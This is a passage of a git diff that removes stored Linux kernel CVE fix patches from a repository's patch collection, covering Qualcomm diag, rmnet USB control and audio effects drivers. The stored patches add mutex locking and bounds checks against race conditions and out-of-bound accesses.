-Date: Fri, 1 Sep 2017 15:19:29 -0700
-Subject: [PATCH] diag: Add protection while processing non-hdlc packets
-
-Currently, there is possibility of out-of-bound accesses during
-handling of data in non-hdlc path. The patch adds proper protection
-when processing non-hdlc packet information to fix the issue.
-
-Bug: 64434485
-CRs-Fixed: 2029216
-Change-Id: I07c466f85bd8ac08226948fea86b1d8567e68431
-Signed-off-by: Hardik Arya <harya@codeaurora.org>
-Signed-off-by: Mishra Mahima <mahima@codeaurora.org>
-Signed-off-by: Jonathan Solnit <jsolnit@google.com>
----
- drivers/char/diag/diagchar.h      |  1 +
- drivers/char/diag/diagchar_core.c |  1 +
- drivers/char/diag/diagfwd.c       | 44 ++++++++++++++++++++++++++++++---------
- 3 files changed, 36 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index de3e160762e9f..c1749d3435732 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -537,6 +537,7 @@ struct diagchar_dev {
- 	unsigned char *buf_feature_mask_update;
- 	uint8_t hdlc_disabled;
- 	struct mutex hdlc_disable_mutex;
-+	struct mutex hdlc_recovery_mutex;
- 	struct timer_list hdlc_reset_timer;
- 	struct mutex diag_hdlc_mutex;
- 	unsigned char *hdlc_buf;
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 590f53c36e511..048e1fd60b805 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -3392,6 +3392,7 @@ static int __init diagchar_init(void)
- 	mutex_init(&apps_data_mutex);
- 	mutex_init(&driver->msg_mask_lock);
- 	mutex_init(&driver->diagfwd_channel_mutex);
-+	mutex_init(&driver->hdlc_recovery_mutex);
- 	init_waitqueue_head(&driver->wait_q);
- 	INIT_WORK(&(driver->diag_drain_work), diag_drain_work_fn);
- 	INIT_WORK(&(driver->update_user_clients),
-diff --git a/drivers/char/diag/diagfwd.c b/drivers/char/diag/diagfwd.c
-index 65bbe7cdd8347..60d126acae99a 100644
---- a/drivers/char/diag/diagfwd.c
-+++ b/drivers/char/diag/diagfwd.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1348,7 +1348,9 @@ static void diag_hdlc_start_recovery(unsigned char *buf, int len,
- 
- 	if (start_ptr) {
- 		/* Discard any partial packet reads */
-+		mutex_lock(&driver->hdlc_recovery_mutex);
- 		driver->incoming_pkt.processing = 0;
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		diag_process_non_hdlc_pkt(start_ptr, len - i, info);
- 	}
- }
-@@ -1362,18 +1364,24 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 	const uint32_t header_len = sizeof(struct diag_pkt_frame_t);
- 	struct diag_pkt_frame_t *actual_pkt = NULL;
- 	unsigned char *data_ptr = NULL;
--	struct diag_partial_pkt_t *partial_pkt = &driver->incoming_pkt;
-+	struct diag_partial_pkt_t *partial_pkt = NULL;
- 
--	if (!buf || len <= 0)
-+	mutex_lock(&driver->hdlc_recovery_mutex);
-+	if (!buf || len <= 0) {
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		return;
--
--	if (!partial_pkt->processing)
-+	}
-+	partial_pkt = &driver->incoming_pkt;
-+	if (!partial_pkt->processing) {
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		goto start;
-+	}
- 
- 	if (partial_pkt->remaining > len) {
- 		if ((partial_pkt->read_len + len) > partial_pkt->capacity) {
- 			pr_err("diag: Invalid length %d, %d received in %s\n",
- 			       partial_pkt->read_len, len, __func__);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			goto end;
- 		}
- 		memcpy(partial_pkt->data + partial_pkt->read_len, buf, len);
-@@ -1387,6 +1395,7 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 			pr_err("diag: Invalid length during partial read %d, %d received in %s\n",
- 			       partial_pkt->read_len,
- 			       partial_pkt->remaining, __func__);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			goto end;
- 		}
- 		memcpy(partial_pkt->data + partial_pkt->read_len, buf,
-@@ -1400,20 +1409,27 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 	if (partial_pkt->remaining == 0) {
- 		actual_pkt = (struct diag_pkt_frame_t *)(partial_pkt->data);
- 		data_ptr = partial_pkt->data + header_len;
--		if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+		if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+						CONTROL_CHAR) {
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			diag_hdlc_start_recovery(buf, len, info);
-+			mutex_lock(&driver->hdlc_recovery_mutex);
-+		}
- 		err = diag_process_apps_pkt(data_ptr,
- 					    actual_pkt->length, info);
- 		if (err) {
- 			pr_err("diag: In %s, unable to process incoming data packet, err: %d\n",
- 			       __func__, err);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			goto end;
- 		}
- 		partial_pkt->read_len = 0;
- 		partial_pkt->total_len = 0;
- 		partial_pkt->processing = 0;
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		goto start;
- 	}
-+	mutex_unlock(&driver->hdlc_recovery_mutex);
- 	goto end;
- 
- start:
-@@ -1426,14 +1442,14 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 			diag_send_error_rsp(buf, len);
- 			goto end;
- 		}
--
-+		mutex_lock(&driver->hdlc_recovery_mutex);
- 		if (pkt_len + header_len > partial_pkt->capacity) {
- 			pr_err("diag: In %s, incoming data is too large for the request buffer %d\n",
- 			       __func__, pkt_len);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			diag_hdlc_start_recovery(buf, len, info);
- 			break;
- 		}
--
- 		if ((pkt_len + header_len) > (len - read_bytes)) {
- 			partial_pkt->read_len = len - read_bytes;
- 			partial_pkt->total_len = pkt_len + header_len;
-@@ -1441,19 +1457,27 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 						 partial_pkt->read_len;
- 			partial_pkt->processing = 1;
- 			memcpy(partial_pkt->data, buf, partial_pkt->read_len);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			break;
- 		}
- 		data_ptr = buf + header_len;
--		if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+		if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+						CONTROL_CHAR) {
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			diag_hdlc_start_recovery(buf, len, info);
-+			mutex_lock(&driver->hdlc_recovery_mutex);
-+		}
- 		else
- 			hdlc_reset = 0;
- 		err = diag_process_apps_pkt(data_ptr,
- 					    actual_pkt->length, info);
--		if (err)
-+		if (err) {
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			break;
-+		}
- 		read_bytes += header_len + pkt_len + 1;
- 		buf += header_len + pkt_len + 1; /* advance to next pkt */
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 	}
- end:
- 	return;
diff --git a/Patches/Linux_CVEs/CVE-2017-11023/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-11023/4.4/0002.patch
deleted file mode 100644
index b910235f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11023/4.4/0002.patch
+++ /dev/null
@@ -1,172 +0,0 @@
-From c36e61af0f770125d0061a8d988d0987cc8d116a Mon Sep 17 00:00:00 2001
-From: Hardik Arya <harya@codeaurora.org>
-Date: Thu, 15 Jun 2017 10:39:34 +0530
-Subject: diag: Add protection while processing non-hdlc packets
-
-Currently, there is possibility of out-of-bound accesses during
-handling of data in non-hdlc path. The patch adds proper protection
-when processing non-hdlc packet information to fix the issue.
-
-CRs-Fixed: 2029216
-Change-Id: I07c466f85bd8ac08226948fea86b1d8567e68431
-Signed-off-by: Hardik Arya <harya@codeaurora.org>
----
- drivers/char/diag/diagchar.h      |  1 +
- drivers/char/diag/diagchar_core.c |  1 +
- drivers/char/diag/diagfwd.c       | 42 ++++++++++++++++++++++++++++++---------
- 3 files changed, 35 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/char/diag/diagchar.h b/drivers/char/diag/diagchar.h
-index 92cf24d..cc56d68 100644
---- a/drivers/char/diag/diagchar.h
-+++ b/drivers/char/diag/diagchar.h
-@@ -578,6 +578,7 @@ struct diagchar_dev {
- 	unsigned char *buf_feature_mask_update;
- 	uint8_t hdlc_disabled;
- 	struct mutex hdlc_disable_mutex;
-+	struct mutex hdlc_recovery_mutex;
- 	struct timer_list hdlc_reset_timer;
- 	struct mutex diag_hdlc_mutex;
- 	unsigned char *hdlc_buf;
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index d8fcfe2..54f638a 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -3621,6 +3621,7 @@ static int __init diagchar_init(void)
- 	mutex_init(&driver->delayed_rsp_mutex);
- 	mutex_init(&apps_data_mutex);
- 	mutex_init(&driver->msg_mask_lock);
-+	mutex_init(&driver->hdlc_recovery_mutex);
- 	for (i = 0; i < NUM_PERIPHERALS; i++)
- 		mutex_init(&driver->diagfwd_channel_mutex[i]);
- 	init_waitqueue_head(&driver->wait_q);
-diff --git a/drivers/char/diag/diagfwd.c b/drivers/char/diag/diagfwd.c
-index 019bf19..7dc2eab 100644
---- a/drivers/char/diag/diagfwd.c
-+++ b/drivers/char/diag/diagfwd.c
-@@ -1405,7 +1405,9 @@ static void diag_hdlc_start_recovery(unsigned char *buf, int len,
- 
- 	if (start_ptr) {
- 		/* Discard any partial packet reads */
-+		mutex_lock(&driver->hdlc_recovery_mutex);
- 		driver->incoming_pkt.processing = 0;
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		diag_process_non_hdlc_pkt(start_ptr, len - i, info);
- 	}
- }
-@@ -1419,18 +1421,24 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 	const uint32_t header_len = sizeof(struct diag_pkt_frame_t);
- 	struct diag_pkt_frame_t *actual_pkt = NULL;
- 	unsigned char *data_ptr = NULL;
--	struct diag_partial_pkt_t *partial_pkt = &driver->incoming_pkt;
-+	struct diag_partial_pkt_t *partial_pkt = NULL;
- 
--	if (!buf || len <= 0)
-+	mutex_lock(&driver->hdlc_recovery_mutex);
-+	if (!buf || len <= 0) {
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		return;
--
--	if (!partial_pkt->processing)
-+	}
-+	partial_pkt = &driver->incoming_pkt;
-+	if (!partial_pkt->processing) {
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		goto start;
-+	}
- 
- 	if (partial_pkt->remaining > len) {
- 		if ((partial_pkt->read_len + len) > partial_pkt->capacity) {
- 			pr_err("diag: Invalid length %d, %d received in %s\n",
- 			       partial_pkt->read_len, len, __func__);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			goto end;
- 		}
- 		memcpy(partial_pkt->data + partial_pkt->read_len, buf, len);
-@@ -1444,6 +1452,7 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 			pr_err("diag: Invalid length during partial read %d, %d received in %s\n",
- 			       partial_pkt->read_len,
- 			       partial_pkt->remaining, __func__);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			goto end;
- 		}
- 		memcpy(partial_pkt->data + partial_pkt->read_len, buf,
-@@ -1457,20 +1466,27 @@ void diag_process_non_hdlc_pkt(unsigned char *buf, int len,
- 	if (partial_pkt->remaining == 0) {
- 		actual_pkt = (struct diag_pkt_frame_t *)(partial_pkt->data);
- 		data_ptr = partial_pkt->data + header_len;
--		if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+		if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+						CONTROL_CHAR) {
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			diag_hdlc_start_recovery(buf, len, info);
-+			mutex_lock(&driver->hdlc_recovery_mutex);
-+		}
- 		err = diag_process_apps_pkt(data_ptr,
- 					    actual_pkt->length, info);
- 		if (err) {
- 			pr_err("diag: In %s, unable to process incoming data packet, err: %d\n",
- 			       __func__, err);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			goto end;
- 		}
- 		partial_pkt->read_len = 0;
- 		partial_pkt->total_len = 0;
- 		partial_pkt->processing = 0;
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 		goto start;
- 	}
-+	mutex_unlock(&driver->hdlc_recovery_mutex);
- 	goto end;
- 
- start:
-@@ -1483,14 +1499,14 @@ start:
- 			diag_send_error_rsp(buf, len, info);
- 			goto end;
- 		}
--
-+		mutex_lock(&driver->hdlc_recovery_mutex);
- 		if (pkt_len + header_len > partial_pkt->capacity) {
- 			pr_err("diag: In %s, incoming data is too large for the request buffer %d\n",
- 			       __func__, pkt_len);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			diag_hdlc_start_recovery(buf, len, info);
- 			break;
- 		}
--
- 		if ((pkt_len + header_len) > (len - read_bytes)) {
- 			partial_pkt->read_len = len - read_bytes;
- 			partial_pkt->total_len = pkt_len + header_len;
-@@ -1498,19 +1514,27 @@ start:
- 						 partial_pkt->read_len;
- 			partial_pkt->processing = 1;
- 			memcpy(partial_pkt->data, buf, partial_pkt->read_len);
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			break;
- 		}
- 		data_ptr = buf + header_len;
--		if (*(uint8_t *)(data_ptr + actual_pkt->length) != CONTROL_CHAR)
-+		if (*(uint8_t *)(data_ptr + actual_pkt->length) !=
-+						CONTROL_CHAR) {
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			diag_hdlc_start_recovery(buf, len, info);
-+			mutex_lock(&driver->hdlc_recovery_mutex);
-+		}
- 		else
- 			hdlc_reset = 0;
- 		err = diag_process_apps_pkt(data_ptr,
- 					    actual_pkt->length, info);
--		if (err)
-+		if (err) {
-+			mutex_unlock(&driver->hdlc_recovery_mutex);
- 			break;
-+		}
- 		read_bytes += header_len + pkt_len + 1;
- 		buf += header_len + pkt_len + 1; /* advance to next pkt */
-+		mutex_unlock(&driver->hdlc_recovery_mutex);
- 	}
- end:
- 	return;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11024/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11024/ANY/0001.patch
deleted file mode 100644
index 984003aa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11024/ANY/0001.patch
+++ /dev/null
@@ -1,115 +0,0 @@
-From f2a482422fefadfa0fa9b4146fc0e2b46ac04922 Mon Sep 17 00:00:00 2001
-From: Liangliang Lu <luliang@codeaurora.org>
-Date: Fri, 5 May 2017 08:50:32 +0800
-Subject: net: usb: rmnet_usb_ctrl:Make sure list_head operate atomically
-
-Get and delete operation on variables "list_elem" are not atomic.
-Multiple threads may get the same "list_elem", may lead to race
-conditions.
-
-Add mutex in rmnet_ctl_open to resolve current potential race condition
-between test_bit and set_bit.
-
-Change-Id: I00c4e2fd4854ee17a13a0757da98c46a78eee4cb
-Signed-off-by: Liangliang Lu <luliang@codeaurora.org>
----
- drivers/net/usb/rmnet_usb_ctrl.c | 32 +++++++++++++++++++++++---------
- 1 file changed, 23 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/net/usb/rmnet_usb_ctrl.c b/drivers/net/usb/rmnet_usb_ctrl.c
-index 58fd1f6..75e9783 100644
---- a/drivers/net/usb/rmnet_usb_ctrl.c
-+++ b/drivers/net/usb/rmnet_usb_ctrl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2014, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -514,8 +514,13 @@ static int rmnet_ctl_open(struct inode *inode, struct file *file)
- 	if (!dev)
- 		return -ENODEV;
- 
--	if (test_bit(RMNET_CTRL_DEV_OPEN, &dev->status))
-+	mutex_lock(&dev->dev_lock);
-+	if (test_bit(RMNET_CTRL_DEV_OPEN, &dev->status)) {
-+		mutex_unlock(&dev->dev_lock);
- 		goto already_opened;
-+	}
-+	set_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+	mutex_unlock(&dev->dev_lock);
- 
- 	if (dev->mdm_wait_timeout &&
- 			!test_bit(RMNET_CTRL_DEV_READY, &dev->cudev->status)) {
-@@ -527,10 +532,15 @@ static int rmnet_ctl_open(struct inode *inode, struct file *file)
- 		if (retval == 0) {
- 			dev_err(dev->devicep, "%s: Timeout opening %s\n",
- 						__func__, dev->name);
--			return -ETIMEDOUT;
--		} else if (retval < 0) {
-+			retval = -ETIMEDOUT;
-+		} else if (retval < 0)
- 			dev_err(dev->devicep, "%s: Error waiting for %s\n",
- 						__func__, dev->name);
-+
-+		if (retval < 0) {
-+			mutex_lock(&dev->dev_lock);
-+			clear_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+			mutex_unlock(&dev->dev_lock);
- 			return retval;
- 		}
- 	}
-@@ -538,14 +548,15 @@ static int rmnet_ctl_open(struct inode *inode, struct file *file)
- 	if (!test_bit(RMNET_CTRL_DEV_READY, &dev->cudev->status)) {
- 		dev_dbg(dev->devicep, "%s: Connection timedout opening %s\n",
- 					__func__, dev->name);
-+		mutex_lock(&dev->dev_lock);
-+		clear_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+		mutex_unlock(&dev->dev_lock);
- 		return -ETIMEDOUT;
- 	}
- 
- 	/* clear stale data if device close called but channel was ready */
- 	rmnet_usb_ctrl_free_rx_list(dev);
- 
--	set_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
--
- 	file->private_data = dev;
- 
- already_opened:
-@@ -564,7 +575,9 @@ static int rmnet_ctl_release(struct inode *inode, struct file *file)
- 
- 	DBG("%s Called on %s device\n", __func__, dev->name);
- 
-+	mutex_lock(&dev->dev_lock);
- 	clear_bit(RMNET_CTRL_DEV_OPEN, &dev->status);
-+	mutex_unlock(&dev->dev_lock);
- 
- 	file->private_data = NULL;
- 
-@@ -638,6 +651,7 @@ ctrl_read:
- 
- 	list_elem = list_first_entry(&dev->rx_list,
- 				     struct ctrl_pkt_list_elem, list);
-+	list_del(&list_elem->list);
- 	bytes_to_read = (uint32_t)(list_elem->cpkt.data_size);
- 	if (bytes_to_read > count) {
- 		spin_unlock_irqrestore(&dev->rx_lock, flags);
-@@ -654,11 +668,11 @@ ctrl_read:
- 			dev_err(dev->devicep,
- 				"%s: copy_to_user failed for %s\n",
- 				__func__, dev->name);
-+		spin_lock_irqsave(&dev->rx_lock, flags);
-+		list_add(&list_elem->list, &dev->rx_list);
-+		spin_unlock_irqrestore(&dev->rx_lock, flags);
- 		return -EFAULT;
- 	}
--	spin_lock_irqsave(&dev->rx_lock, flags);
--	list_del(&list_elem->list);
--	spin_unlock_irqrestore(&dev->rx_lock, flags);
- 
- 	kfree(list_elem->cpkt.data);
- 	kfree(list_elem);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11025/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11025/ANY/0001.patch
deleted file mode 100644
index 1969cbbf..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11025/ANY/0001.patch
+++ /dev/null
@@ -1,248 +0,0 @@
-From 95e72ae9281b77abc3ed0cc6a33c17b989241efa Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Sun, 26 Mar 2017 20:07:43 +0800
-Subject: ASoC: msm: qdspv2: add mutex to prevent access same memory
- simultaneously
-
-Add mutex protection to avoid simultaneous access the
-same memory by multiple threads.
-
-CRs-Fixed: 2013494
-Change-Id: I440ea633ceb7312637c9a3b29d22236166d21a39
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 34 +++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 089a827..e7c28a6 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -148,6 +148,8 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 	case AUDIO_START: {
- 		pr_debug("%s: AUDIO_START\n", __func__);
- 
-+		mutex_lock(&effects->lock);
-+
- 		rc = q6asm_open_read_write_v2(effects->ac,
- 					FORMAT_LINEAR_PCM,
- 					FORMAT_MULTI_CHANNEL_LINEAR_PCM,
-@@ -159,6 +161,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: Open failed for hw accelerated effects:rc=%d\n",
- 				__func__, rc);
- 			rc = -EINVAL;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 		effects->opened = 1;
-@@ -175,6 +178,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: Write buffer Allocation failed rc = %d\n",
- 				__func__, rc);
- 			rc = -ENOMEM;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 		atomic_set(&effects->in_count, effects->config.input.num_buf);
-@@ -185,6 +189,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: Read buffer Allocation failed rc = %d\n",
- 				__func__, rc);
- 			rc = -ENOMEM;
-+			mutex_unlock(&effects->lock);
- 			goto readbuf_fail;
- 		}
- 		atomic_set(&effects->out_count, effects->config.output.num_buf);
-@@ -199,6 +204,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		if (rc < 0) {
- 			pr_err("%s: pcm read block config failed\n", __func__);
- 			rc = -EINVAL;
-+			mutex_unlock(&effects->lock);
- 			goto cfg_fail;
- 		}
- 		pr_debug("%s: dec: sample_rate: %d, num_channels: %d, bit_width: %d\n",
-@@ -213,6 +219,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: pcm write format block config failed\n",
- 				__func__);
- 			rc = -EINVAL;
-+			mutex_unlock(&effects->lock);
- 			goto cfg_fail;
- 		}
- 
-@@ -225,6 +232,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			effects->started = 0;
- 			pr_err("%s: ASM run state failed\n", __func__);
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_WRITE: {
-@@ -286,8 +294,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		uint32_t idx = 0;
- 		uint32_t size = 0;
- 
-+		mutex_lock(&effects->lock);
-+
- 		if (!effects->started) {
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -304,11 +315,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		if (!rc) {
- 			pr_err("%s: read wait_event_timeout\n", __func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 		if (!atomic_read(&effects->in_count)) {
- 			pr_err("%s: pcm stopped in_count 0\n", __func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -316,15 +329,18 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		if (bufptr) {
- 			if (!((void *)arg)) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			if ((effects->config.buf_cfg.input_len > size) ||
- 				copy_to_user((void *)arg, bufptr,
- 					  effects->config.buf_cfg.input_len)) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	default:
-@@ -456,6 +472,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 	switch (cmd) {
- 	case AUDIO_SET_EFFECTS_CONFIG: {
- 		pr_debug("%s: AUDIO_SET_EFFECTS_CONFIG\n", __func__);
-+		mutex_lock(&effects->lock);
- 		memset(&effects->config, 0, sizeof(effects->config));
- 		if (copy_from_user(&effects->config, (void *)arg,
- 				   sizeof(effects->config))) {
-@@ -473,6 +490,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 			 effects->config.input.num_buf,
- 			 effects->config.input.sample_rate,
- 			 effects->config.input.num_channels);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_BUF_LEN: {
-@@ -494,6 +512,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 
- 		buf_avail.input_num_avail = atomic_read(&effects->in_count);
- 		buf_avail.output_num_avail = atomic_read(&effects->out_count);
-+		mutex_lock(&effects->lock);
- 		pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
- 			 __func__, buf_avail.output_num_avail,
- 			 buf_avail.input_num_avail);
-@@ -503,16 +522,20 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_PP_PARAMS: {
-+		mutex_lock(&effects->lock);
- 		if (copy_from_user(argvalues, (void *)arg,
- 				   MAX_PP_PARAMS_SZ*sizeof(long))) {
- 			pr_err("%s: copy from user for pp params failed\n",
- 				__func__);
-+			mutex_unlock(&effects->lock);
- 			return -EFAULT;
- 		}
- 		rc = audio_effects_set_pp_param(effects, argvalues);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	default:
-@@ -578,12 +601,14 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 	case AUDIO_SET_EFFECTS_CONFIG32: {
- 		struct msm_hwacc_effects_config32 config32;
- 		struct msm_hwacc_effects_config *config = &effects->config;
-+		mutex_lock(&effects->lock);
- 		memset(&effects->config, 0, sizeof(effects->config));
- 		if (copy_from_user(&config32, (void *)arg,
- 				   sizeof(config32))) {
- 			pr_err("%s: copy to user for AUDIO_SET_EFFECTS_CONFIG failed\n",
- 				__func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			break;
- 		}
- 		config->input.buf_size = config32.input.buf_size;
-@@ -620,16 +645,19 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 			 effects->config.input.num_buf,
- 			 effects->config.input.sample_rate,
- 			 effects->config.input.num_channels);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_BUF_LEN32: {
- 		struct msm_hwacc_buf_cfg32 buf_cfg32;
- 		struct msm_hwacc_effects_config *config = &effects->config;
-+		mutex_lock(&effects->lock);
- 		if (copy_from_user(&buf_cfg32, (void *)arg,
- 				   sizeof(buf_cfg32))) {
- 			pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n",
- 				__func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			break;
- 		}
- 		config->buf_cfg.input_len = buf_cfg32.input_len;
-@@ -637,6 +665,7 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 		pr_debug("%s: write buf len: %d, read buf len: %d\n",
- 			 __func__, effects->config.buf_cfg.output_len,
- 			 effects->config.buf_cfg.input_len);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_GET_BUF_AVAIL32: {
-@@ -644,6 +673,7 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 
- 		memset(&buf_avail, 0, sizeof(buf_avail));
- 
-+		mutex_lock(&effects->lock);
- 		buf_avail.input_num_avail = atomic_read(&effects->in_count);
- 		buf_avail.output_num_avail = atomic_read(&effects->out_count);
- 		pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
-@@ -655,22 +685,26 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_PP_PARAMS32: {
- 		long argvalues[MAX_PP_PARAMS_SZ] = {0};
- 		int argvalues32[MAX_PP_PARAMS_SZ] = {0};
- 
-+		mutex_lock(&effects->lock);
- 		if (copy_from_user(argvalues32, (void *)arg,
- 				   MAX_PP_PARAMS_SZ*sizeof(int))) {
- 			pr_err("%s: copy from user failed for pp params\n",
- 				__func__);
-+			mutex_unlock(&effects->lock);
- 			return -EFAULT;
- 		}
- 		for (i = 0; i < MAX_PP_PARAMS_SZ; i++)
- 			argvalues[i] = argvalues32[i];
- 
- 		rc = audio_effects_set_pp_param(effects, argvalues);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_START32: {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11028/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-11028/3.18/0001.patch
deleted file mode 100644
index 56ff10b7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11028/3.18/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
